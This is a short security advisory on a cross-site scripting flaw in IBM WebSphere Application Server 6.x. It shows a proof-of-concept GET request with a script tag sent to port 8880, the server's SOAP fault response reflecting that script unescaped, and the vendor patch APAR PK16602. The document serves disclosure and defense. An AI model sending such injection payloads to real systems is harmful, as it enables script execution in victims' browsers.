|
|
| |
| IBM WebSphere Application Server is vulnerable to cross site scripting through a 'faultfactor' tag in the 500 Internal Server Error page on port 8880 (default SOAP port). |
| |
Credit:
The information has been provided by Nuri Fattah.
|
| |
Vulnerable Systems:
* WebSphere Application Server version 6.x
WebSphere Application Server is vulnerable to a cross site scripting attack through the Internal Server Error page used on port 8880 of the default WebSphere installation. This may allow the execution of malicious script code in the browser of an individual who clicks on a link to a site using the vulnerable version of WebSphere.
Request:
GET /<SCRIPT>alert('Can%20Cross%20Site%20Attack')</SCRIPT> HTTP/1.1
Host: 192.168.1.195:8880
Connection: close
Results:
HTTP/1.1 500 Internal Server Error
Server: WebSphere Application Server/6.0
Content-Type: text/xml; charset=utf-8
Content-Length: 3013
Connection: close
<?xml version='1.0' encoding='UTF-8'?>
<SOAP-ENV:Envelope
xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<SOAP-ENV:Header xmlns:ns0="admin" ns0:WASRemoteRuntimeVersion="6.0.0.1"
ns0:JMXMessageVersion="1.0.0" ns0:JMXVersion="1.2.0">
</SOAP-ENV:Header>
<SOAP-ENV:Body>
<SOAP-ENV:Fault>
[output omitted]
<faultactor>/<SCRIPT>alert('Can%20Cross%20Site%20Attack')</SCRIPT></faultactor>
</SOAP-ENV:Fault>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
Solution:
IBM has released patches to address this issue. They have tracked this vulnerability as APAR PK16602.
|
|
|
